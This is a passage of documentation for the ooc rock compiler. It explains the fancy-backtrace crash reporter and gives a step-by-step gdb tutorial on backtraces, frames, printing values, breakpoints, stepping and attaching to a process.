C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:67) 15 __crash_closure403_thunk() in crash (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:66) 16 loop() in lang/Abstractions (at C:/msys64/home/amwenger/Dev/rock/sdk/lang/Abstractions.ooc:2) 17 App run_impl() in crash (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:65) 18 App run() in crash (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:80) 19 main() in (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:1) 20 crtexe.c (from C:\msys64\home\amwenger\Dev\rock\test\sdk\lang\crash.exe) 21 crtexe.c (from C:\msys64\home\amwenger\Dev\rock\test\sdk\lang\crash.exe) 22 BaseThreadInitThunk (from C:\Windows\system32\kernel32.dll) 23 RtlUserThreadStart (from C:\Windows\SYSTEM32\ntdll.dll)
In the case above,
Fancy backtraces works on Windows, Linux, and OSX, on both 32 and 64-bit machines.
To use it, simply go in the rock directory and do:
make extensions
A few dependencies might be needed, such as
binutils-dev and
zlibg1-dev on
Debian, or a few brew formulas on OSX.
Fancy backtrace principle
Basically, whenever an exception is thrown, a backtrace is captured. It contains a list of frames, e.g. the addresses of the various function calls (as can be seen above).
If an Exception isn’t caught, the program will abort, but before it does, the backtrace captured when the exception was thrown is formatted nicely and printed out to the standard error stream.
Similarly, when the program receives a signal (such as SIGSEGV), a backtrace is printed to help the developer know when things were wrong.
Since fancy-backtrace has more dependencies than rock itself, it’s a little bit harder to build, and that’s why it exists as a dynamic library (a .dll file on Windows, .dylib on OSX, and .so on Linux).
When a program compiled in the debug profile starts up, it attempts to load the library. If it succeeds, it will use it to display friendly stack traces. If it doesn’t, it will fall back to the execinfo interface (which displays only function names, not source files or line numbers), or to… nothing, on Windows.
By default, the fancy_backtrace.{dll,so,dylib} file is copied along to the rock
binary, in
${ROCK_DIST}/bin. An ooc executable will first look in its own
directory (useful if the application is distributed on a system that doesn’t
have rock), and will then search in the directory where the rock executable
resides (useful on a developer system).
Fancy backtrace configuration
The default setting is to display something as helpful as possible. However, if
one wants unformatted backtraces, one may define the
RAW_BACKTRACE
environment variable:
RAW_BACKTRACE=1 ./myprogram
To disable the usage of fancy-backtrace altogether, one may use the
NO_FANCY_BACKTRACE environment variable:
NO_FANCY_BACKTRACE=1 ./myprogram
Crash course in gdb
GDB, the GNU Debugger, is the canonical tool to debug C applications compiled with gcc (or even clang).
For example, writing this in
dog.ooc
Dog: class { shout: func { raise("Woops, not implemented yet") } } main: func { work() } work: func { Dog new() shout() }
Compiling with
rock -pg gives an executable,
dog, and a folder with C files.
Running
We can run it with gdb like this:
gdb dog
If we wanted to pass arguments we could do
gdb --args dog arg1 arg2 arg3
Inside gdb, we are greeted with a prompt. Typing
run (or
r) for short, followed
by a line feed, runs the program. In this case, it aborts and tells us where it failed:
(gdb) r Starting program: /Users/amos/Dev/tests/dog Reading symbols for shared libraries +.............................. done [Exception]: Woops, not implemented yet Program received signal SIGABRT, Aborted. 0x00007fff96b82d46 in __kill ()
Getting a backtrace
However, as-is, we don’t know much. So it died in
__kill — that seems to be a system
function on OSX (where this doc was written). How about a nice backtrace instead? Running
backtrace or simply
bt will give you that:
(gdb) bt #0 0x00007fff96b82d46 in __kill () #1 0x00007fff8edfadf0 in abort () #2 0x0000000100007121 in lang_Exception__Exception_throw_impl (this=0x100230030) at Exception.ooc:205 #3 0x00000001000072a3 in lang_Exception__Exception_throw (this=0x100230030) at Exception.ooc:241 #4 0x0000000100008090 in lang_Exception__raise (msg=0x100231600) at Exception.ooc:104 #5 0x0000000100000e9b in dog__Dog_shout_impl (this=0x100238ff0) at dog.c:3 #6 0x0000000100000ef0 in dog__Dog_shout (this=0x100238ff0) at dog.ooc:11 #7 0x0000000100001131 in dog__work () at dog.ooc:12 #8 0x0000000100001102 in main (__argc2=1, __argv3=0x7fff5fbff230) at dog.ooc:8
We have from left to right - the frame number, the address of the function (we can ignore), the name of the function, then the arguments and their values, and then the files where they were defined (if they can be found) along with the line number.
Reading code with context
As expected, we can see ooc line numbers in the backtrace. What if we want to
investigate the code without opening the .ooc file ourselves? We can just place
ourselves in the context of frame 7 with
frame 7 or simply
f 7:
(gdb) f 7 #7 0x0000000100001131 in dog__work () at dog.ooc:12 12 Dog new() shout()
Want more context, e.g. the lines of code around? Use
list (or simply
l)
(gdb) l 7 main: func { 8 work() 9 } 10 11 work: func { 12 Dog new() shout() 13 } (gdb)
Inspecting values
GDB can also print values. For example, going back to frame 2, we can inspect
the exception being thrown by using
p, for short):
(gdb) f 2 #2 0x0000000100007121 in lang_Exception__Exception_throw_impl (this=0x100230030) at Exception.ooc:205 205 abort() (gdb) p this $4 = (lang_Exception__Exception *) 0x100230030
Getting an address is not that useful, though, how about printing the content of an object instead? We can dereference the object from within gdb:
(gdb) p *this $10 = { __super__ = { class = 0x100047e60 }, backtraces = 0x100234f40, origin = 0x0, message = 0x100231600 }
What if we want to read the message? Since it’s an ooc String, we’ll need to print the content of the underlying buffer:
(gdb) p *this.message._buffer $11 = { __super__ = { __super__ = { class = 0x100047490 }, T = 0x1000478c0 }, size = 26, capacity = 0, mallocAddr = 0x0, data = 0x10002fe24 "Woops, not implemented yet" }
Inspecting generics
Inspecting generics is a bit trickier - one has to cast it directly to the
right type. For example, the
Exception class has a LinkedList of backtraces,
which is a generic type. We can inspect it:
(gdb) p *this.backtraces $21 = { __super__ = { __super__ = { __super__ = { __super__ = { class = 0x10004b2b0 }, T = 0x100047df0 } }, equals__quest = { thunk = 0x10001a660, context = 0x0 } }, _size = 0, head = 0x100239f60 }
Not so useful. What about head?
(gdb) p *this.backtraces.head $22 = { __super__ = { class = 0x10004b4a0 }, T = 0x100047df0, prev = 0x100239f60, next = 0x100239f60, data = 0x100238fe0 "" }
Looks like a node from a doubly-linked list. We’re on the right track! However,
data is printed as a C string (since generics are
uint8_t* under the hood, and
uint8_t is usually typedef’d to
char). We can cast it:
(gdb) p (lang_types__Pointer) *this.backtraces.head.data $24 = (lang_types__Pointer) 0x0
Which seems about right, as the exception has not been re-thrown (obviously the example here is rather specific, but the general techniques can be applied to any ooc application).
Breakpoints
What if we want to inspect values somewhere the program wouldn’t stop naturally?
In the program above, we could set up a breakpoint when the constructor of
Dog
is called.
It can be non-trivial to determine the C symbol corresponding to an ooc function.
Tab-completion is here to the rescue though - typing
break dog_ and then hitting
Tab twice will display a helpful list of symbols:
(gdb) break dog_<TAB><TAB> dog__Dog___defaults__ dog__Dog___load__ dog__Dog_init dog__Dog_shout dog__work dog__Dog___defaults___impl dog__Dog_class dog__Dog_new dog__Dog_shout_impl dog_load
Here, we seem to want
dog__Dog_new. As a rule, we have
packagename__ClassName_methodName_suffix.
Setting up the break point does nothing until we run the program:
(gdb) break dog__Dog_new Breakpoint 1 at 0x100000f3a: file dog.ooc, line 1. (gdb) r Starting program: /Users/amos/Dev/tests/dog Reading symbols for shared libraries +.............................. done Breakpoint 1, dog__Dog_new () at dog.ooc:1 1 Dog: class {
Stepping
From there, we can investigate as before, with
backtrace,
frame,
step will enter the functions being called, whereas
next will skip them
and return to the prompt when the functions have fully executed.
The shorthand for
step is
s, and the shorthand for next is
n. When we step, we can see everything
being executed, including string and object allocation:
(gdb) s dog__Dog_class () at dog.ooc:25 Line number 25 out of range; dog.ooc has 13 lines. (gdb) Line number 26 out of range; dog.ooc has 13 lines. (gdb) Line number 27 out of range; dog.ooc has 13 lines. (gdb) lang_types__Object_class () at types.ooc:55 55 if(object) { (gdb) dog__Dog_class () at dog.ooc:28 Line number 28 out of range; dog.ooc has 13 lines. (gdb) Line number 29 out of range; dog.ooc has 13 lines. (gdb) lang_String__makeStringLiteral (str=0x10002fe20 "Dog", strLen=3) at String.ooc:377 377 String new(Buffer new(str, strLen, true)) (gdb) lang_Buffer__Buffer_new_cStrWithLength (s=0x10002fe20 "Dog", length=3, stringLiteral__quest=true) at Buffer.ooc:59 59 init: func ~cStrWithLength(s: CString, length: Int, stringLiteral? := false) { (gdb) lang_Buffer__Buffer_class () at Buffer.ooc:157 157 clone: func ~withMinimum (minimumLength := size) -> This { (gdb) 158 newCapa := minimumLength > size ? minimumLength : size (gdb) 163 copy (gdb) 0x00000001000050dd in lang_Buffer__Buffer_new_cStrWithLength (s=0x10002fe20 "Dog", length=3, stringLiteral__quest=true) at Buffer.ooc:59 59 init: func ~cStrWithLength(s: CString, length: Int, stringLiteral? := false) { (gdb) lang_types__Class_alloc__class (this=0x100047490) at types.ooc:54 54 object := gc_malloc(instanceSize) as Object (gdb)
Note that some line numbers seem to be problematic here - but we still get to see which parts of the
code get executed and in which order. Instead of typing
s every time, we can just hit Enter to
re-execute the last command.
When we’re done stepping and just want to resume program execution, we can use
continue (or
c for short).
Quitting
When we’re done running gdb, we can quit with
quit (or
q for short). It might ask for confirmation
if the program is still running, but otherwise, it’s all good.
Attaching to a process
Up to there, we have seen how to run a program from gdb. What if we want to attach gdb to a process that has been
launched somewhere else? Let’s try with this program,
sleep.ooc:
import os/Time main: func { while (true) { doThing() Time sleepSec(1) } } doThing: func { "Hey!" println() }
Compiling it with
rock -pg and running it with
./sleep prints
Hey! every second, as expected.
To attach to this process, we need to find out its process ID. We can either use the
ps command line
utility, or we can interrupt its execution with
Ctrl-Z (in most shells, like bash, zsh, etc.). You
might see something like this:
amos at coyote in ~/Dev/tests $ ./sleep Hey! Hey! Hey! ^Z [1] + 48130 suspended ./sleep
And the process ID is
48130 here. We can attach gdb to that process like this:
gdb attach 48130
When attaching to a process, GDB will pause execution, waiting for orders. Quitting gdb will then detach gdb from the process, which will resume execution.
If you need to quit the process, you can bring it back to the front with the
fg shell
command, then exit it with
Ctrl-C.
Other tips
ooc vs C line numbers
By default, rock will output ‘sourcemaps’, mapping C code back to the original ooc code that generated it. This allows the debugger to display ooc line numbers, as seen above. This behavior can be disabled with:
rock --nolines
In which case gdb will fall back to displaying C line numbers (corresponding to the files generated by rock). This can be useful if you suspect that rock is generating invalid code, or if the ooc line numbers are messed up for some reason. | https://ooc-lang.org/docs/tools/rock/debug/ | CC-MAIN-2018-51 | refinedweb | 2,451 | 66.44 |
Loading OBJ files and displaying meshes in Viewport helpPosted Thursday, 13 February, 2014 - 20:46 by Rogad in
Hi everyone :)
Just discovered OpenTK today after going around a lot of places. I got the tutorial starter program working fine with the triangle.
I'm just thinking now about more complex things.
Short story - I am building an animated talking head using OBJ files and morph targets. I have got this all working in C# with WPF. All well and good, but the performance whilst okay, could do with a speed injection so I can add more features to my talking head.
Anyway, so now I am looking at OpenTK, which I understand will use the graphics card. I'm still learning 3D but understand some of the basics.
I understand what makes up a mesh and I have been using Helix 3D Toolkit with WPF. But like I said my code is not that fast.
So it's back to Windows Forms as the OpenTK toolkit doesn't really seem to need the WPF 3D functions despite me liking them make my life easy. ;)
But I need a new OpenTK method of importing an OBJ file. I found an OBJ mesh loader here :
Given all this, once I have loaded the OBJ into a mesh, how do I go about displaying it in the Viewport ?
Could someone possibly give me some sample code ? If so that would be great !
Thanks for reading :)
Re: Loading OBJ files and displaying meshes in Viewport help
I found this page, which is where the OBJ importer code comes from originally :
I grabbed the two cs files and they are now in my project. I had to update some of it as the 'math' had been moved to OpenTK namespace. But the code essentially remains the same. The project builds without errors except I just get a black window.:
Here's my Program.cs :
The model is on the desktop, it's made with quads. It's a human figure model. But yeah, I am probably making a noob mistake or the OBJ importer is not working.
I thought maybe someone could have a glance at my code above. Am I right in thinking that the game.RenderFrame is called continuously ? I guessed that is a loop so put the render call in there.
I imagine I need to be setting up a camera or something somehow ? I have no idea what the Ortho line does yet maybe that is where I am going wrong :/
Cheers :)
Re: Loading OBJ files and displaying meshes in Viewport help
This is correct, UpdateFrame and RenderFrame are called in a loop until you call Exit().
If you want to use WinForms or WPF, then you should add a reference to OpenTK.GLControl and drag-drop a GLControl on your Form/WindowsFormsHost. The GameWindow is meant to be used standalone.
GL.Ortho is an OpenGL 1.x call that sets up an orthographic projection. If the model is not visible it might be that it falls outside of your camera frustum (e.g. behind the camera of outside the left/right/top/bottom/far planes.) Try something like:
Chapter 3 of the Red Book covers this topic in more detail. The OpenGL wiki is another useful resource mostly focused on modern, shader-based OpenGL.
Re: Loading OBJ files and displaying meshes in Viewport help
Hi,
Thanks for the reply and the explanations. Currently I am just playing with the standalone window, trying to get this importer to work. I found the tutorial for the GLControl. I'll take a look at those links too.
I tried
GL.Ortho(-1, 1, -1, 1, -1024, 1024);
But I still get a black screen.
With the window are the camera controls linked to the mouse or is that something you have to build ?
I thought maybe I could go hunting for the model if it's even there.
Cheers.
Re: Loading OBJ files and displaying meshes in Viewport help
Not out of the box. OpenTK allows you to program the GPU using low-level OpenGL commands - it's not a high level toolkit like WPF.
That said, building a camera is not very difficult. Google for "OpenTK camera".
I would suggest testing the camera on a simple example like VBOStatic.cs before you test the obj reader, just in case there is a bug in the reader.
Re: Loading OBJ files and displaying meshes in Viewport help
I just thought, should I be adding a light to the game window or is there a light already set up ?
Re: Loading OBJ files and displaying meshes in Viewport help
Lighting is disabled by default. When lighting is disabled, vertices are colored using
GL.Color4()(IIRC, default is white).
Re: Loading OBJ files and displaying meshes in Viewport help
OK then I should be seeing something if there's anything there. I think I will do some of the tutorials and come back to this. Thanks for your help.
Re: Loading OBJ files and displaying meshes in Viewport help
try this in your setup viewport .
amd move your cam position
the new vecot3 x,y,z positions so you can change your view maybe the model is not in the came region | http://www.opentk.com/node/3556 | CC-MAIN-2015-22 | refinedweb | 877 | 82.85 |
#include <std/disclaimer.h>
/*
* I am not responsible for bricked devices, dead SD cards, thermonuclear
* war, or the current economic crisis caused by you following these directions.
* YOU are choosing to make these modificiations, and if you point your finger at
* me for messing up your device, I will laugh at you.
*/
Changelog:
1.6.26:
)
1.4.26.1:
_Corrected mount points in kernel: Camera pics saved on internal
_Minor fixes in kernel
_NTFS module for testing (may not work)
1.4.26:
_Fixed Bootloop issue (Removed EXT4 Tweaks for now)
_Fixed ICS Long Press Home Key in Phone Mode
_Mount Points reverted back to original
_Re-stabilized
_Updated Google Maps
1.4.25:
_Fixed root issues. Everyone should get proper root coming from any ROM.
_LP6 Rooted & Modded Kernel (on test; soon to be replaced with open source kernel)
_EXT4 Tweaks applied on second boot (long press power key if you get stuck)
_External SD card mount point is now /mnt/sdcard (following CM9 standards)
_Internal SD card mount point is now /mnt/emmc (following CM9 standards) Your titanium Backup location may need to be changed.
_Superuser app is back with Root Browser.
_X-plore removed. Can be installed from market though.
_GPS should be better. Don't expect to be perfect yet.
_Recording format set to "MP4".
_Updated Google apps and other apps.
_Fixed mobile data toggle not updating for serious
_Fixed navigation buttons for tablets
_Long press home options added to General Interface for phones that have hardware buttons
_Fixed icon transparency being applied to right-side buttons (BT, etc)
_Add BT MAP Profile
_Fixed
_Bluetooth: Fixed memory leak and file handles leak
_Nav bar & tablet status bar FCs fixed
_Fixed some init.d scripts not running due to lack of bash
_Changing brightness by sliding on the top of the statusbar (if enabled) shouldn’t FC anymore
_Added bluetooth headset config
_Other fixes of AOKP build 33 which where not included.
1.4.19:
_Beta Testing Completed!
_Complete AOKP compiled (no separate patches from CM9)
_Added missing fonts
_Services.jar patched for OOM Tweaking
_DSP Manager removed
_Updated Apps: Google Maps, Xplore and Videos
(New Feature)
_Quiet Hours: Configure the hours your device should be quiet and/or still
_Statusbar: Added ability to WeatherPanel to start a custom app
_Statusbar: Added ability to hide signal bars
_Statusbar: Customizable font size
_Statusbar: Customizable icon transparency
_Added German translation for weather
_Fix CRT Off Animation
_Fix embedded flash on websites
_Fix compass
_Fix disabling Camera Sounds
_Fix camera internal issues
_Other small fixes
Beta 5.0 (14/4/2012):
_Android 4.0.4 - Complete New Build
_Big Big Update, Wipe Wipe Data!!
_Market purchase fixed
_Changing Lockscreen Wallpaper fixed
_Navigation bar overhaul (ability to set custom actions/icons and long-press actions)
_DSP Manager re-implemented (on test - please review this if you use this)
_Other AOKP Fixes - Complete sync upto build 31
_All scripts revised.
_Media scanner and media server related scripts removed as it's fixed internally.
_Updated apps. Modded market replaced with original one (to ensure proper purchase)
_Framework Fixes
_Dalvik Fixes
_Media Server Fixes
_Gallery FC Fixes
_Service Manager Fixes
_Embedded Flash Player Fixes (Not completely tested)
Beta 4.5 (11/4/2012):
_Reverted system apps to 4.0.3. Fixed FCs.
Beta 4.4 (10/4/2012):
_Integrated 95% of system apps from 4.0.4 (Framework base is still 4.0.3)
_Services.jar patched to improve OOM. (Better RAM management and kill lag)
_Kernel Tweaks. Default Governor - Ondemand.
_CPU Tweaks. Both cores set online on each boot.
_I/O Scheduling set to "Deadline".
_Application boost tweaks - Faster zipaligning on every boot and optimizing database.
_EXT4 Tweaks re-added (were removed in 4.3) to boost I/O.
_GMail and Play Store updated.
_Euphoria Control updated to integrate viewing calendar events on lockscreen. Changing LS wallpaper still FCs.
_Device Settings separated from Euphoria Control and available directly in system settings app.
_Root-browser removed as not compatible with SuperSU. Use Xplore from Market instead.
_Overall smoothness and response greatly increased. Blazing fast and rock stable.
_STK (Sim Toolkit) implemented and added.
_Torch app & File manager app added.
_OTG Support testing. Check /mnt/usbdisk.
_Launcher FC on reboot fixed. Latest Apex launcher.
_Launcher with increased heap size and zero lag. These tweaked settings will vanish if you update launcher.
_Modem Auto-Install Removed.
_New updater-script. Thanks to antiochasylum for graphics.
Beta 4.3 (3/4/2012):
_LP5 Kernel Auto-Install - 1.4 GHz Dual Core Activated
_LP5 Modem Auto-Install
_Market Fixed for missing apps
_Camera Fixes for LP5 Kernel
_LP5 RIL Library added
_WiFi Fixes
Beta 4.2 (1/4/2012):
_Camera Recording Fixed.
_Added SuperNote for Tablet Mode and FreeNote for PhoneUI Mode.
_Audio Fixes.
_DSP manager removed due to some instability.
_First boot freeze at boot animation fixed.
_Market fixes.
_Minor media enhancements.
_This is not a new build rather fixes over previous build.
Beta 4.1 (29/3/2012):
_Added missing toggles: Data, 2G/3G, Tethering.
_Added missing fonts.
_Zip-aligned all apps.
Beta 4 (29/3/2012):
_Complete new build with new device tree.
_Lot's of source work & fixes.
_Complete native USB Mass Storage. Removed UMS app developed by us.
_New RIL base from I220 ICS Leak. Before this we were using SGS2 RIL base.
_Storage option in settings don't FC.
_New options to explore in Euphoria Control (EC).
_Synced with AOKP-28
_DSP Manager added and working.
_Hardware keys backlight on by default. To turn it off use Device Settings in EC.
_Greatly increased I/O and thus quadrant if at all it matters.
_Updated few apps.
_Market fixes. No more error while installing app from market.
Beta 3 (20/3/2012):
_USB Mass Storage using our app. Both external and internal mount!
_Nova Launcher replaced with Apex Launcher.
_Maps and Youtube added. Working.
_+ Titanium Backup works. Still have minor issue with some.
_Some minor tweaks
Beta 2 (18/3/2012):
_Proper ROOT and installation steps.
_All options of Euphoria Control works.
_Market Fixed.
Beta 1 (18/3/2012):
Initial Release
Stunner Mods/Themes:
_Various Transitions by tremerone
_Recent Apps Mod by Matius444
_Themes by m3dd0g
Useful Links:
_ICS LP1 Direct Link
_ICS LP1 Repack and TriangleAway
_ICS Modems LP5 and LP6
_Apps for Tablet Mode
Fixes:
_SystemUI Crash Fix in Tablet Mode
_160 dpi Phone apk crash
_Random Reboots
_Sleep of Death
Tip #1: Switch between Tablet/PhoneUI, the easy way..
o get tablet mode on ICS Stunner, please follow this steps:
Settings > Euphoria Control > General UI > Switch Tablet/PhoneUI > Custom > 200 (Tablet) > Reboot.
After Reboot, go to Apex Launcher Settings and set grid size to 6x6 or 6x5 to enjoy full screen accommodation of icons.
If you still don't get Tablet Mode, that means your device isn't rooted properly and you need to clean install this ROM.
It is important to follow the steps mentioned there carefully.
Tip #2: Getting vibrant colors on screen.. the awesome AMOLED
Settings > Galaxy Note Settings > Screen Tab > Mode > DYNAMIC
This setting would give you stunning vibrant colors. Try it.
XDA Developers was founded by developers, for developers. It is now a valuable resource for people who want to make the most of their mobile devices, from customizing the look and feel to adding new functionality. Are you a developer? | http://forum.xda-developers.com/showthread.php?t=1552554&page=1 | CC-MAIN-2014-10 | refinedweb | 1,227 | 67.55 |
Repositories on Docker HubEstimated reading time: 9 minutes
Docker Hub repositories let you share images with co-workers, customers, or the Docker community at large. If you’re building your images internally, either on your own Docker daemon, or using your own Continuous integration services, you can push them to a Docker Hub repository that you add to your Docker Hub user or organization account.
Alternatively, if the source code for your Docker image is on GitHub or Bitbucket, you can use an “Automated build” repository, which is built by the Docker Hub services. See the automated builds documentation to read about the extra functionality provided by those services.
Searching for images
You can search the Docker Hub registry via its search interface or by using the command line interface. Searching can find images by image name, user name,
Repositories..
Viewing repository tags
Docker Hub’s repository “Tags” view shows you the available tags and the size of the associated image.
Image sizes are the cumulative space taken up by the image and all its parent
images. This is also the disk space used by the contents of the Tar file created
when you
docker save an image.
Creating a new repository on Docker Hub
When you first create a Docker Hub user, you will have a “Get started with Docker Hub.” screen, from which you can click directly into “Create Repository”. You can also use the “Create ▼” menu to “Create Repository”.
When creating a new repository, you can choose to put it in your Docker ID
namespace, or that of any organization that you are in the “Owners”
team. The Repository Name will need to be unique in that namespace, can be two
to 255 characters, and can only contain lowercase letters, numbers or
- and
_.
The “Short Description” of 100 characters will be used in the search results, while the “Full Description” can be used as the Readme for the repository, and can use Markdown to add simple formatting.
After you hit the “Create” button, you then need to
docker push images to that
Hub based repository.
Pushing a repository image to Docker Hub
In order to push a repository to the Docker Hub, you need to
name your local image using your Docker Hub username, and the
repository name that you created in the previous step.
You can add multiple images to a repository, by adding a specific
:<tag> to
it (for example
docs/base:testing). If it’s not specified, the tag defaults to
latest.
You can name your local images either when you build it, using
docker build -t <hub-user>/<repo-name>[:<tag>],
by re-tagging an existing local image
docker tag <existing-image> <hub-user>/<repo-name>[:<tag>],
or by using
docker commit <exiting-container> <hub-user>/<repo-name>[:<tag>] to commit
changes.
Now you can push this repository to the registry designated by its name or tag.
$ docker push <hub-user>/<repo-name>:<tag>
The image will then be uploaded and available for use by your team-mates and/or the community.
Stars
Your repositories can be starred and you can star repositories in return. Stars are a way to show that you like a repository. They are also an easy way of bookmarking your favorites.
You can interact with other members of the Docker community and maintainers by leaving comments on repositories. If you find any comments that are not appropriate, you can flag them for review.
Collaborators and their role
A collaborator is someone you want to give access to a private repository. Once
designated, they can
push and
pull to your repositories. They will not.
Private repositories
Private repositories allow you to have repositories that contain images that you want to keep private, either to your own account or within an organization or team.
To work with a private repository on Docker Hub, you will need to add one using the Add Repository button. You get one private repository for free with your Docker Hub user account (not usable for organizations you’re a member of). If you need more accounts you can upgrade your Docker Hub plan.
Once the private repository is created, you can
push and
pull images to and
from it using Docker.
Note: You need to be signed in and have access to work with a private repository.
Private repositories are just like public ones. However, it isn’t possible to browse them or search their content on the public registry. They do not get cached the same way as a public repository either.
It is possible to give access to a private repository to those whom you designate (i.e., collaborators) from its “Settings” page. From there, you can also switch repository status (public to private, or vice-versa). You will need to have an available private repository slot open before you can do such a switch. If you don’t have any available, you can always upgrade your Docker Hub plan.
Webhooks
A webhook is an HTTP call-back triggered by a specific event. You can use a Hub repository webhook to notify people, services, and other applications after a new image is pushed to your repository (this also happens for Automated builds). For example, you can trigger an automated test or deployment to happen as soon as the image is available.
To get started adding webhooks, go to the desired repository in the Hub, and
click “Webhooks” under the “Settings” box. A webhook is called only after a
successful
push is made. The webhook calls are HTTP POST requests with a JSON
payload similar to the example shown below.
Example webhook JSON payload:
{ 66822e+09, "pusher": "svendowideit" }, "repository": { "comment_count": 0, "date_created": 1.417566665e+09, "description": "", "full_description": "webhook triggered from a 'docker push'", "is_official": false, "is_private": false, "is_trusted": false, "name": "busybox", "namespace": "svendowideit", "owner": "svendowideit", "repo_name": "svendowideit/busybox", "repo_url": "", "star_count": 0, "status": "Active" } }
Note: If you want to test your webhook, we recommend using a tool like requestb.in. Also note, the Docker Hub server can’t be filtered by IP address.
Webhook chains
Webhook chains allow you to chain calls to multiple services. For example, you can use this to trigger a deployment of your container only after it has been successfully tested, then update a separate Changelog once the deployment is complete. After clicking the “Add webhook” button, simply add as many URLs as necessary in your chain.
The first webhook in a chain will be called after a successful push. Subsequent URLs will be contacted after the callback has been validated.
Validating a callback
In order to validate a callback in a webhook chain, you need to
- Retrieve the
callback_urlvalue in the request’s JSON payload.
- Send a POST request to this URL containing a valid JSON body.
Note: A chain request will only be considered complete once the last callback has been validated.
To help you debug or simply view the results of your webhook(s), view the “History” of the webhook available on its settings page.
Callback JSON data
The following parameters are recognized in callback data:
state(required): Accepted values are
success,
failure, and
error. If the state isn’t
success, the webhook chain will be interrupted.
description: A string containing miscellaneous information that will be available on": "" } | https://docs.docker.com/docker-hub/repos/ | CC-MAIN-2017-47 | refinedweb | 1,211 | 53.21 |
Your browser does not seem to support JavaScript. As a result, your viewing experience will be diminished, and you have been placed in read-only mode.
Please download a browser that supports JavaScript, or enable it if it's disabled (i.e. NoScript).
I have a python generator with two integers as user data. The two integer sliders control the start and length of a timeline marker. Currently the timeline markers only update to the new integer value on mouse-up. However I would like the timeline markers to update on each value change as the user slides the integer.
How is this possible? I have been trying different messaging and event add techniques but not finding a solution. Thank You for any help.
Hi,
you should show us some code, it is really hard to tell what you are doing otherwise.
Note that the Python Generator's main() function is bound by threading limitations.
main()
The appropriate choice to force a redraw of managers is usually c4d.GeSyncMessage().
c4d.GeSyncMessage()
Cheers
zipit
hello,
On your generator you can create the Message function and react accordingly.
To check if the marker already exist, the most direct and easiest way is to use its name.
you can find other ids you can use on this page
This is a basic example, you may want to add some extra functionalities.
import c4d
def FindMarker(timeOfMarker, name):
# Retrieves the first marker of document
fm = c4d.documents.GetFirstMarker(doc)
# for each markers checks compare its name
while fm:
if fm.GetName() == name:
return fm
fm = fm.GetNext()
return None
def RemoveAndCreate(timeOfMarker, name):
# Checks if marker alread exist (compare name)
mark = FindMarker(timeOfMarker, name)
# Removes the maker if it exist
if mark is not None:
mark.Remove()
# Returns the exising marker
return c4d.documents.AddMarker(doc, None, timeOfMarker, name)
def message(id, data):
# if User Data are changed
if id == c4d.MSG_DESCRIPTION_VALIDATE:
# Retrieves the User Data values
fmt = op[c4d.ID_USERDATA,1]
smt = op[c4d.ID_USERDATA,2]
# Creates the Marker, Removes the existing ones first)
RemoveAndCreate(fmt, "First Maker")
RemoveAndCreate(smt, "Second Marker")
c4d.EventAdd()
return True
def main():
pass
Cheers
Manuel
Thank You @m_magalhaes and @zipit
Both your suggestions were very helpful. The controller works very well @m_magalhaes I just needed to convert my user data input to BaseTime and it works perfectly.
I was able to solve the updating issue to work how I want. I only needed to add:
c4d.GeSyncMessage(c4d.EVMSG_TIMECHANGED)
Now my timeline markers update nicely as I change values.
This topic can be marked solved. | https://plugincafe.maxon.net/topic/11839/update-timeline-markers-on-user-data-slider-input | CC-MAIN-2021-31 | refinedweb | 428 | 58.58 |
This guide provides instructions on how to consume or use SAP BRMS in EJB.
Applies to:
This Document Holds good for all CE 7.3 SPXX. This method can also be used for Older version of CE (CE7.1 SP01 on-wards) with some difference in contend .
Summary:
This guide describes step-by-step how to return single value and multiple values from Decision Table.To Explain this we are using 2 Examples to explain how to read SAP BRMS in EJB.
Example 1 : Single set of values Returned.
Example 2 : Multiple List of values Returned.(How to consume or use SAP BRMS in EJB Part 2.)
We will be discussing following points in detail in this document –
- How to create & use EJB DTO inside BRMS.
- How to use “EngineInvoker” class file.
- How to call the rules from EJB.
- How to read the response received from BRMS.
- How to test the rules service.
Special Thanks to Samudra Gupta Samudra Gupta for his guidance to Document the process.
Example : Based on Entered Plant & product code delivery plant is to be defined.
Step 1 : Create an DTO called “Plant” as shown below:
import java.io.Serializable; public class Plant implements Serializable{ private static final long serialVersionUID = -3420223731187536617L; private String plant ; private String productCode ; private String deliveryPlantList ; public String getPlant() { return plant; } public void setPlant(String plant) { this.plant = plant; } public String getProductCode() { return productCode; } public void setProductCode(String productCode) { this.productCode = productCode; } public String getDeliveryPlantList() { return deliveryPlantList; } public void setDeliveryPlantList(String deliveryPlantList) { this.deliveryPlantList = deliveryPlantList; } }
Step 2: Expose the Class file in public Parts as shown below:
- Right click on the EJB project. Click on “Development Component” . Click on “Show In” . Select “Component Properties”.
- On Selecting “Component Properties” The tab Shown below opens up. Click on “Public Parts”. Right Click on “Client” and Select “Manage Entities”.
- On Selecting “Manage Entities” the below Pop up opens up. Click on the “Java Class”. Click on the package “dto” . Select Plant and click on Next or Finished.
- On Click of finish the plant is added to public Part as shown below:
- Repeat 2 & 3 for “ejbjar” and the plant will be added to the public part as shown below:
Step 3 : Build the test/ejb/module and add it in “Dependencies” of “test/rules”. Only “Design Time” is required.
Step 4 : Go to the rules project and add the dto class.
- Open “Project Resource”. Click on the “Aliases” tab. Click on Add.
- On Click of “Add” the below pop Up opens up. Select the “Class” Option.
- On Selecting Class another pop up opens up which looks as shown below. Open the Package select the “Plant” . Click on the arrow to add in the Selected Class. It will appear as shown below. Finally click on Finish.
- On Clicking of “Finish” the Plant gets added in the “Alias Name” List. Expand it and rename “Plant.getPlant” with “EnteredPlant” & “Plant.getProductCode” with “ProductCode”.
Step 5 : Now Right Click on “Rules Modeling” & Select “New Ruleset”.
Setp 6 : On Selecting “New Ruleset” a pop up opens up as shown below. Enter the name to the rule set like “DeliveryPlantRuleset”.
Step 7 : On Clicking on “OK” We get a new Rule Set created as shown below:
Step 8 : Creation of Rules & Decision Table.
- To create a “Decision Table” we have 2 process to create new “Decision Table”
- Right Click on “Decision Table” and select “New Decision Tables…”.
- Open “DeliveryPlantRuleset”. Click on “Decision Table” Tab. Click on “New” button.
- On selecting either of the method we get the below pop up. Enter the “Decision Table Name” & “Comments”. Click on “Next”.
